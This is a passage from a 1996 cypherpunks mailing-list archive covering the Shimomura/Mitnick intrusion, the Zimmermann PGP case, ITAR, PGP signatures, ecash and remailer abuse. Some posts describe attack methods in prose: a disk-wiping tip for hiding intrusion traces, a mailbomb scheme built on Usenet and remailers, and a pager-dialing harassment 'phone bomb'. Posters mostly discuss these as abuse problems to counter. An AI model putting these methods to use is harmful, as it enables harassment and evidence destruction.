But has Phil sold the photos to a tabloid yet?

Simon

 (defun modexpt (x y n)  "computes (x^y) mod n"
  (cond ((= y 0) 1) 
	((= y 1) (mod x n))
	((evenp y) (mod (expt (modexpt x (/ y 2) n) 2) n))
	(t (mod (* x (modexpt x (1- y) n)) n))))





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Thu, 11 Jan 96 17:25:54 PST
To: mianigand@unique.outlook.net (Michael C. Peponis)
Subject: Re: Shimomura on TV?
In-Reply-To: <199601120102.TAA21599@unique.outlook.net>
Message-ID: <199601120124.TAA04433@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


> Why let it bother you? You must understand that the majority of the 
> population of the United States is working class trash, the news 

"Working class trash"?  You are starting to sound like slick 
willie..."the problem with this country is the working class" or some 
such nonsense...
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Thu, 11 Jan 96 17:39:02 PST
To: Mark <mark@zang.com>
Subject: Re: Mitnik and Shimomura
In-Reply-To: <199601112238.MAA04861@zang.com>
Message-ID: <Pine.SUN.3.91.960111193209.23671A-100000@dfw.dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Jan 1996, Mark wrote:

> It was not a trap. Shimomura was caught with his proverbials down. His
> arrogance made him complacent and as such he didnt take the most basic
> steps to keep the attack out.
> 
> According to Tsutomo's own account of the incident he was only able to
> decipher what happened because the attacker(s) didnt clean away the info
> off the hard drive when they were finished. They rm'd sure but he dd'd
> the raw disk to another drive and worked through the blocks until he
> found the two tools that were used to effect the intrusion. He was also
> able to recover the tcpdump logs that were erased.
> 
> If the intruder(s) had rm'd the data and THEN done a mkfile that filled the
> disk with 0's then most of what we know today would not be available.
> As mentioned a week or two back, filling the unused portions of blocks with
> 0's would probably also be necessary.

Yes but the the attacker would have been a malicous one wouldnt he?

> As to wether Mitnik is capable of effecting the intrusion, that is yet to
> be ascertained. He claims no involvement in it and based on whats known of
> his cracking prowess there is a certain truth to it. He's infinitely better
> with a phone than a keyboard.
> 

And hes not the one that made the phonecalls either.
BTW,I'am I the only one bother to see my tax dollars being wasted
my scsd.edu hosting www.takedown.com a commercial venture?
Iam sure T&M have ebough money after book and movie deals to pay
for their net access.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Thu, 11 Jan 96 18:05:57 PST
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <9601120029.AA04608@zorch.w3.org>
Message-ID: <199601120205.UAA02271@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> >	We've made no progress. Phil has lots lots of time and gained
> >lots of grey hairs, and everyone who donated to his defense fund lost
> >money.
> 
> No progress? At least Phil is not going off on a trip to Alcatraz to
> make small ones out of big ones. Thats a big plus in many peoples books.

I wish I could make another of my pollyannaish posts now, but I agree with
Sameer.  It's great that Phil's off the hook, but there's nothing to stop
them from doing the same thing to someone else tomorrow.  What's more,,
everyone here knows that, and so the government gets what it really wants: 
a chilling effect on crypto development. 

How much credit do you give a guy when he stops beating his wife?  They
put Phil through the ringer, made him spend his money on lawyers, and
added a lot of stress to his life.  But they haven't admitted that they
were wrong, and they haven't renounced such actions in the future.

We're all very happy that Phil's out of the woods, and today's
announcement is a great thing.  

But it's not enough. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 11 Jan 96 18:42:52 PST
To: cypherpunks@toad.com
Subject: legal question
Message-ID: <199601120242.VAA19147@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



A question for our local attorneys.

There have been several times in the past where people have questioned
whether cryptographic hash functions like SHA and the like are
exportable under the ITAR?

In a joint declaration of facts not in dispute as part of Karn
v. State Department, the following was agreed by the government:
(see http://www.qualcomm.com/people/pkarn/export/karnsf.html)

     34. Three of the source code listings on the diskette and in Part
         Five of the Applied Cryptography book, MD-5, N-HASH, and SHS
         are "hashing routines" that perform a data authentication
         function and, by themselves, are not controlled for export
         under the ITAR because cryptographic software that is solely
         limited to a data authentication function is excluded from
         Category XIII(b) of the United States Munitions List. See 22
         C.F.R. 121.1 XIII(b)(vi).

Would this not mean that the government is estopped from ever again
claiming that hash functions are export controlled under the ITAR?

Just curious as to whether or not things have been made more clear...

Perry

PS they also admit in the same declaration to having broken Enigma in
WWII. A shocking revelation.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@dal1820.computek.net>
Date: Thu, 11 Jan 96 19:45:54 PST
To: cypherpunks@toad.com
Subject: web reference to PRZ FAX from US Atty
Message-ID: <199601120345.VAA15609@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Got this off the web - it's a link to the letter that Phil got from the 
US attorney:

http://www.eff.org/pub/Alerts/usatty_pgp_011196.announce

U.S. Atty. DROPS PGP INVESTIGATION!
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPXZYyS9AwzY9LDxAQG4BgP+PmA6GoUSMCpnvUfo+1v1MpFX0pdg66jN
Foo5yuT+G2fIG1m+K4aVrZusPHhC+tHjx2kaMqn0ZSE9nC8U32blpt01+CE+xgp3
x4q5L6llkyEK4oWSrnjbZImcjm3VIrAiaj8S3+qGfAz3FEZ5ChJZ2Q4J91lsqv5z
3FY/xiKqu60=
=Nrr2
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Murray <davidm@iconz.co.nz>
Date: Thu, 11 Jan 96 01:32:38 PST
To: cypherpunks@toad.com
Subject: Some questions about ecash[tm]
Message-ID: <199601110932.WAA09988@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Some questions that I send into the ether in the
knowledge, or hope, that the great and the good
are listening, and will enlighten me...

(Since this exercise strikes even me as incredibly
presumptious, feel free to ignore this. [It takes
less energy than flaming. If you must flame, do
it in private email - I'll post a summary to the
list :-)])

1. Has there been any significant/in-depth coverage
of the Mark Twain Banks product in the financial/
banking press? Digicash's press file stops just
before the launch, and Digicash/Mark Twain Banks
press releases are not exactly what I'm looking for.

2. In the Digicash ecash tutorial (also referenced
from MT's website) the example is given of Alice
sending ecash to Cindy (Candy, Clarissa?). Cindy's
bank checks with Alice's bank before crediting
Cindy's wallet with the $5.00 sent.

In MT's FAQ, they refer, somewhat wistfully, to
a future where the ecash systems of different
banks may be able to interoperate.

How difficult would such interoperation be? Is this
something that is inherent/built into the Digicash
supplied bank system? Or would it require significant
changes to the way things are done?

Similarly, since the software supplied by Digicash
to MT customers seems somewhat MT specific, how
easy would it be for future ecash issuers to piggy
back on MT's customer base? How about merchants?

3. The MT ecash[tm] project is repeatedly referred
to as an experiment, a system in beta phase. Any
word on when the experiment will be over, or what
it is trying to prove/discover?



The thrust of these questions, of course, is How
easy will it be for the next eBank? And the one
after that? Is Digicash ready for the move to
multiple issuers? Does it have the resources to
assist another institution to launch ecash this
year? This month? One a month for the year?

Whatever. Too many questions that cannot possibly
be answered, even if there were answers to give...

Dm


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPTVR1lo3j8JHzalAQG/JAP/dBNTMHdo4MP7TaIAZrKwMxt3U4fH/qsb
TipYBcS8lgEgUsD9Pu/enIzxeEs52K6ARnq1BE6V/G1jxFVbfnLmfV6t6TWqRxSM
68FH3eX0+ZBGFGzDMmvOGWaibZETfHikv55q7ZuqYrnfZ+wrIPKlF+UGiNY3lJlw
rpNkY3oBwqY=
=0g2R
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@Networking.Stanford.EDU>
Date: Fri, 12 Jan 96 18:52:41 PST
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <199601030407.UAA12551@comsec.com>
Message-ID: <Pine.ULT.3.91.960112020051.6769E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


An easy short-term partial solution would be to modify mailcrypt, bap, or
whatever front end you use to automatically put the current date and (a
shortened form of) the To: or Newsgroups: header into the PGP signature
Comments: line. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Guy Geens <ggeens@elis.rug.ac.be>
Date: Fri, 12 Jan 96 18:52:51 PST
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <199601030407.UAA12551@comsec.com>
Message-ID: <Pine.HPP.3.90.960112122431.13836G-100000@idesbald.elis.rug.ac.be>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 12 Jan 1996, Rich Graves wrote:

> Date: Fri, 12 JAN 1996 02:04:13 -0800 
> From: Rich Graves <llurch@Networking.Stanford.EDU>
> Newgroups: netcraft.cypherpunks, alt.security.pgp, sci.crypt,
>     mail.cypherpunks
> Subject: Re: A weakness in PGP signatures, and a suggested solution (long) 
> 
> An easy short-term partial solution would be to modify mailcrypt, bap, or
> whatever front end you use to automatically put the current date and (a
> shortened form of) the To: or Newsgroups: header into the PGP signature
> Comments: line. 
> 
> -rich

PGP totally ignores the Comment: line. How do you think this helps?
(Note: references are signed with the rest of the message ;-)

Guy Geens <guy.geens@elis.rug.ac.be>: Ph.D. student at ELIS -- TFCG / IMEC 
Atypical civil engineer -- And proud of it!
Home Page: http://www.elis.rug.ac.be/ELISgroups/tfcg/staff/gg.html 
finger ggeens@elis.rug.ac.be for PGP public keys (or use keyserver) 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQBVAwUBMPZFaXwHoCha5QR1AQG/0wH/XmSC8y6/IKk3kuDYFTOCVvU6+j+Zlu0B
XpssrtwG3Fhck0CyJhYLzpqfw2D5wj8lL/SLsilmd8fVLo//jLUmSw==
=8xTy
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Fri, 12 Jan 96 09:36:32 PST
To: bshantz@nwlink.com
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <199601121619.IAA06808@montana.nwlink.com>
Message-ID: <199601121731.MAA05385@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > Well, so far the feds haven't prosecuted "Jim Bidzos" for posting Crypto++
> > to usenet.  Anyway, both versions have been on utopia.hacktic.nl for months.
>  
> I thought that it was determined to be a hoax.  Someone "disguised" 
> as Jim Bidzos posted it to USENET.

So what? Prosecute him anyhow; let HIM prove he's innocent.
Isn't that the way it's SUPPOSED to work in the U S of A, now-a-daze?


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 12 Jan 96 09:38:08 PST
To: cypherpunks@toad.com
Subject: Toad Sex
Message-ID: <199601121737.MAA22857@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The oldest and most trustworthy way to crack crypto --
and a cryptologist -- is sex, regularly employed by
royalty and traitors, tyrants and anarchists, governments
and bandits, warfighters and jealous lovers, spouses and
businesses, and whatever other position/opposition
pleasures and betrays.

If you have a security system that does not protect
against it you're really fucked.

Just who is doing what to who in "Takedown" constitutes
its shameless Hollywoodian prurience, as it was in
Littman, Clancy, Vinge, Tolstoy, the Bible, the Koran,
the Kama Sutra, any indecent Exon-prohibition of your
dreams.

Shimomura, Markoff, Mitnick -- are the games of seductive
illusion they're playing so different from vaunted
cryptography of the ever-randy, coy/decoy Net?

Has nobody ever blurted their password in the throes of
passionate words?

Imagine Toad Hall and what was up in the hot tub.













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 12 Jan 96 12:57:27 PST
To: Rich Salz <rsalz@osf.org>
Subject: Re: Boston talk on offshore banks
In-Reply-To: <9601122001.AA18808@sulphur.osf.org>
Message-ID: <Pine.ULT.3.91.960112125323.10905Y-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Every issue of The Economist (and I'm sure lots of other publications)
has ads for this kind of thing.

Anyone know a reference for ranking the "legitimacy" of these services
and seminars? I'd assume that many of them are scams that will gladly
take your money overseas, but you might never see it again.

Probably follow up offline, because cpunk relevance is a bit tenuous.

-rich

On Fri, 12 Jan 1996, Rich Salz wrote:

> I heard an ad on the radio for a free seminar on how to protect your assets
> using off-shore banks.  I forget who the speaker is, I think they're with
> the English-Irish bank in Austria, or something like that.  The thrust
> was to save assets for when you retire and Social Security isn't there
> for you.
> 
> I'm posting this since off-shore banking touches on privacy issues
> and comes up here now and then.
> 
> Two dates, Jan 17 (Newton, MA) or Jan 18 (Burlington, MA).
> Call 617 663 3299 for more info.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Fri, 12 Jan 96 12:58:43 PST
To: Alan Bostick <abostick@netcom.com>
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <Q6q9w8m9LYlM085yn@netcom.com>
Message-ID: <Pine.LNX.3.91.960112135217.4191B-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

regarding remailer spams:

one way to prevent this sort of spamming is to put a cap on the number
of messages that can be delivered to a given address.  of course, an
exception will have to be made for instances of chaining so that the
number of messages allowed to be forwarded to another remailer is not
limited.  

i'm trying to think of a scenario where this would not be a good
thing.  i suppose if somone was conducting an anonymous poll their
address should not have a limit.

i'm sure there are problems with a mesg quota system, but it does seem
like an easy solution.

- -pjf

patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.3.56 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMPbLOE3Qo/lG0AH5AQHJWgQAmvlOnHIAiWZz3Dw/czAeKEeylCTUVxRi
BFTwFPbwTR2QtwcLfDpw5+Ym/Qss2jx1MVoVJuTbjx4D7GGitSdYSWN6TuAapUdr
oeFPo5+EuIwAT77luwYWa9gXYN36IZlWuzYgdbjkMorxz0UwSn4Y8U1fnaAmTh1e
GwZhC5+tcZw=
=bzmC
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Fri, 12 Jan 96 18:53:31 PST
To: cypherpunks@toad.com
Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
In-Reply-To: <Pine.3.89.9601122137.A12495-0100000@styx.ios.com>
Message-ID: <Pine.LNX.3.91.960112194848.6120A-100000@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 12 Jan 1996, Jay Holovacs wrote:

> Date: Fri, 12 Jan 1996 21:31:27 -0500 (EST)
> From: Jay Holovacs <holovacs@styx.ios.com>
> To: zinc <zinc@zifi.genetics.utah.edu>
> Cc: Alan Bostick <abostick@netcom.com>, cypherpunks@toad.com
> Subject: Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com
> 
> 
>  
> On Fri, 12 Jan 1996, zinc wrote:
> 
> > regarding remailer spams:
> > 
> > one way to prevent this sort of spamming is to put a cap on the number
> > of messages that can be delivered to a given address.  of course, an
> > exception will have to be made for instances of chaining so that the
> > number of messages allowed to be forwarded to another remailer is not
> > limited.  
> > 
> > i'm trying to think of a scenario where this would not be a good
> > thing.  i suppose if somone was conducting an anonymous poll their
> > address should not have a limit.
> > 
> > i'm sure there are problems with a mesg quota system, but it does seem
> > like an easy solution.
> > 
> Unrelated legitimate messages may arrive after the 'limit ' has been reached.

i realize this is an obvious problem.  although this is a weakness,
i'm not sure it would really matter.  if a person was going to be
doing something on the net they expected would generate a lot of anon
traffic they could notifiy the remailer operators.  this has other
weaknesses related to forgeries but there's only so much that can be
done...

obviously this is not going to be an easy problem to solve.

- -pjf


patrick finerty = zinc@zifi.genetics.utah.edu = pfinerty@nyx.cs.du.edu
U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA!
** FINGER zinc-pgp@zifi.genetics.utah.edu for pgp public key - CRYPTO!
zifi runs LINUX 1.3.56 -=-=-=WEB=-=-=->  http://zifi.genetics.utah.edu 


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by mkpgp1.6, a Pine/PGP interface.

iQCVAwUBMPcejU3Qo/lG0AH5AQEteQP/Ss6/bPyii2WW/2Z1qJG+J+sDAfI1RAuU
zKpnS6pCPGaoF/Hn4YYDwyG6ut168KP536Q+fQDTV0yPuTKxT1pjO2+vqY8XeOmA
Mj/D8cOEN6dMPThp8Tgd93/wJKRE1+lW70YkXAybMtISMe3ulrOVCXyNcAGAhpQj
f35BKt2km3g=
=PeFd
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: galactus@stack.urc.tue.nl (Arnoud "Galactus" Engelfriet)
Date: Sun, 14 Jan 96 13:49:19 PST
Subject: Re: A weakness in PGP signatures, and a suggested solution (long)
In-Reply-To: <199601030407.UAA12551@comsec.com>
Message-ID: <FIs9w4uYOdBC089yn@stack.urc.tue.nl>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.ULT.3.91.960112020051.6769E-100000@Networking.Stanford.EDU>,
Rich Graves <llurch@Networking.Stanford.EDU> wrote:
> An easy short-term partial solution would be to modify mailcrypt, bap, or
> whatever front end you use to automatically put the current date and (a
> shortened form of) the To: or Newsgroups: header into the PGP signature
> Comments: line. 

That line can be clipped off by everyone, without even so much as a peep
from PGP.  Perhaps a better solution would be to copy the To:  and
Newsgroups: headers into the body of the message?

Galactus

- -- 
To find out more about PGP, send mail with HELP PGP in the SUBJECT line to me.
E-mail: galactus@stack.urc.tue.nl - Please PGP encrypt your mail if you can.
Finger galactus@turtle.stack.urc.tue.nl for public key (key ID 0x416A1A35).
Anonymity and privacy page: <http://www.stack.urc.tue.nl/~galactus/remailers/>


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAgUBMPbYTDyeOyxBaho1AQGtvAQA2bVrvx7Argv/MjjA7cOGpJNzV0AGg96J
PvOsknNKfUj9n/gRLDNlGeL+j8wcdpgpdv1h2udmL582nv1T6r/m1ZI6wxedDUvk
eGt+KpNKijXuTdXRTvdVV/Wxahk2/3TgoA0U40CZmm1s1Ckk506T1dkGkt19UsvO
/5sBQ/eKUhY=
=S/aM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 12 Jan 96 18:47:20 PST
To: cypherpunks@toad.com
Subject: Cybersloth
Message-ID: <199601130247.VAA11438@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Shimomura and Markoff give an illuminating account of
   tracking system break-ins; it is in those that Tsutomu and
   his road crew really dazzle. Skip the filmic crud and enjoy
   the gritty details of hackers hacking, stretching legality
   and propriety, emulating their mocking nemeses.

   Glimpse the far-side hackers, say, jsz and jft and xxx,
   still taunting, eluding, taking down, making pay for job-
   security cybersloths.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Fri, 12 Jan 96 04:08:17 PST
To: bal@martigny.ai.mit.edu
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <9601120040.AA03530@toad.com>
Message-ID: <199601121206.XAA04446@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> Of course they can; they're the U.S. government.  No possible outcome of
> Phil's case would have changed this fact.  If the Federal government
> wishes to make your life miserable they can always do so.

The more important point being missed of course that Phil has and no
doubt will continue to make certain elements of the U.S government
quite miserable indeed. Something that I suspect doesn't make Phil too
miserable at all.

-- 
+----------------------------------+-----------------------------------------+
|Julian Assange                    | "if you think the United  States has    |
|FAX: +61-3-9819-9066              |  stood still, who built the largest     |
|EMAIL: proff@suburbia.net         |  shopping centre in the world?" - Nixon |
+----------------------------------+-----------------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 12 Jan 96 21:01:40 PST
To: cypherpunks@toad.com
Subject: Re: Novel use of Usenet and remailers to mailbomb
Message-ID: <v02120d04ad1ce99ff703@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Jammin' on the mailbomb trick...

Looks like it's a variant of another scheme used elsewhere, viz,


--- begin forwarded text

To: rah@shipwright.com (Robert A. Hettinga)
From: oldbear@arctos.com (The Old Bear)
Subject: Re: Novel use of Usenet and remailers to mailbomb
Date: Fri, 12 Jan 1996 23:10:43 EDT

rah@shipwright.com (Robert A. Hettinga) writes:

>From: rah@shipwright.com (Robert A. Hettinga)
>Newsgroups: tiac
>Subject: Novel use of Usenet and remailers to mailbomb
>Date: Fri, 12 Jan 1996 14:34:18 -0500
>Organization: e$

>| Somebody, too clever for their own good by half, has come up with a
>| novel way of using Usenet and anonymous remailers to perpetrate
>| mailbombs.  The M.O. is to post a message to the naked-lady newsgroups
>| saying "get pics in your mailbox! send this message to this address!),
>| giving the email address of a cypherpunk-style anonymous remailer and
>| including a pgp-encrypted message block.


A variation on the mailbomb from dispersed unwitting sites, except involving
the telephone network, was discussed on alt.dcom.telecom some time back.

Maybe you call this a phone bomb.

As you know, pager companies get blocks of numbers within a local
exchange for their operations.  So, for example, 635-3000 to 635-3999 may
represent a thousand radio pager customers of a particular paging
company.

Wanting to harrass an estranged spouse, some nefarious character
programmed a dialler deamon to sequentially call each of the numbers in
a pager block and leave a messsage to return call to the spouse's phone
number.  Naturally, caller id did no good to track or ignore the
unwanted calls to the spouse at all hours from pager subscribers who
were receiving messages on their alpha-numberic pagers to call the
spouse's number.  'Wrong number' calls were coming in to the spouse from
all over at all times.  Moreover, it is virtually impossible for a pager
company to track a single number which calls each of its lines only once.

Definitely not a nice thing.
--- end forwarded text


Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"Reality is not optional." --Thomas Sowell
The NEW(!) e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 13 Jan 96 05:03:37 PST
To: cypherpunks@toad.com
Subject: Re: (fwd) e$: Starting an Avalanche
Message-ID: <2.2.32.19960113130559.00bc7dec@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:33 PM 1/12/96 -0500, Robert Hettinga wrote:

>The most interesting thing I've read in quite a while is a reprint of
>the March 31,1995 issue of Esther Dyson's Release 1.0, which, I
>understand, was the first time someone other than Esther herself edited
>an issue.
>
>The editor was none other than Eric Hughes, of cypherpunks fame, and the
>topic was, of course, e$. Well, he didn't up and say "e$" anywhere,
>exactly, the title of the whole issue was "A Long-Term Perspective on
>Electronic Commerce",

I'll second that.  I read part of the draft as Eric was working on it at
CFP95.  Good work.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 13 Jan 96 20:48:53 PST
To: Jeff Weinstein <doclulu@infobahnos.com
Subject: Re: (none) [httpd finding your identity]
Message-ID: <199601140447.UAA12493@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:16 PM 1/13/96 -0800, Jeff Weinstein wrote:
>  I've removed the code that uses the e-mail address as the
> FTP password for anonymous FTPs.  You can still enter it by
> hand by using a URL of this form 'ftp://anonymous@ftp.netscape.com'.
>
> [...]
>
>   The fix for this will be in the next [netscape] beta, and the final
> version of 2.0.

Thank you.

This excellent new feature is more important than you know.

The FTC is threatening to regulate the net, and is using as
its excuse the claim that advertisers will or are threatening
to send junk email to be people who browse their web pages.  

To protect the internet from this terrible threat they wish
to regulate every computer that puts up a web page in a
similar fashion to their regulation of TV and radio.

This simple technical fix deprives the FTC of that excuse.  
It will have to concoct a new excuse.  Unless someone 
deliberately configures their netscape browser to provide
the information, no one can send them junk mail.


> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sat, 13 Jan 96 09:35:42 PST
To: shamrock@netcom.com
Subject: Digital postage and remailer abuse (was Re: Novel use of Usenet and remailers to mailbomb from luzskru@cpcnet.com)
In-Reply-To: <v02120d02ad1ce02500bc@[192.0.2.1]>
Message-ID: <sI+9w8m9LA9Q085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02120d02ad1ce02500bc@[192.0.2.1]>,
shamrock@netcom.com (Lucky Green) wrote:

> I am not sure that postage would solve this problem. The geeks would
> individually pay for it. Still, nominal postage would solve a lot of the
> problems that plague remailnet.

Maybe I'm misunderstanding how using digital postage with remailers would
work.  I was assuming that the postage stamp would be included *inside*
the encrypted envelope, that what the remailer would do on receipt of
mail would be: (a) decrypt the envelope; (b) validate the postage stamp;
and (if the stamp is valid) (c) forward the message according to the
now-decryped instructions.

Using this model, if the perpetrator doesn't include a postage stamp,
then the message is ignored.  If the perp includes a stamp, the first
horny net geek's message is relayed but subsequent ones get bounced for
invalid postage.

If the message requires external postage (remailer processing cycle is
process postage *before* decrypting envelope), then at the very least
the horny net geeks have to get their own postage stamps, putting a step
in the way of instant gratification.  What's more, doing this would
require *some* understanding of how the remailer network operates.  One
should never underestimate the degree of cluelessness present on the
net, but knowing how to use remailers makes it more likely that somebody
could recognize this as a mailbomb rather than a legitimate offer.

What's more, even external postage works to block this attack used with 
a chain of remailers, because the second remailer's stamp would have to
be provided by the perpetrator, inside the encrypted envelope sent to
the first one.

The very nature of this attack makes me wonder whether it would be
worthwhile to implement a digital postage scheme for remailers that
doesn't happen to be backed by real money.  The remailers would continue
to be free to use, and currency exchange hassles would be avoided, but
many of the benefits of abuse prevention would be in place.  So would
the infrastructure to upgrade to pay-to-play remailers at a later date.

- -- 
   Alan Bostick             | He played the king as if afraid someone else 
Seeking opportunity to      | would play the ace.
develop multimedia content. |      John Mason Brown, drama critic
Finger abostick@netcom.com for more info and PGP public key

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMPfnweVevBgtmhnpAQH1egMAk1MK45EQGYPseEjBLQfXTW9Wxl2OGHpg
2JoVjs/9N8PMElcwTCRSpKvP9aZQ3UgEqDhDkcTe7z+W20VmcXOxZalj71t/NjeV
vHqpa3rJ7vF0VcPl2OhKvZz1pBW1oia4
=6zkD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 13 Jan 96 22:28:15 PST
To: Rich Graves <cypherpunks@toad.com
Subject: Re: [noise] The economics of super-stars - partial cite
Message-ID: <199601140628.WAA23934@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:55 PM 1/13/96 -0800, Rich Graves wrote:
> Title refers to Sendero Luminoso, a particularly bizarre Maoist cult that 
> has been brutally repressed by Fujimori in recent years.

Your use of the word "brutal" in this context is a little odd.  Since Sendero
Luminoso are extraordinarily cruel terrorists and mass murderers, it is
entirely proper and appropriate for Fujimoro to attempt to physically
exterminate them.  Possibly what you meant to imply is that Fujimoro 
failed to make adequate distinction between support for the political
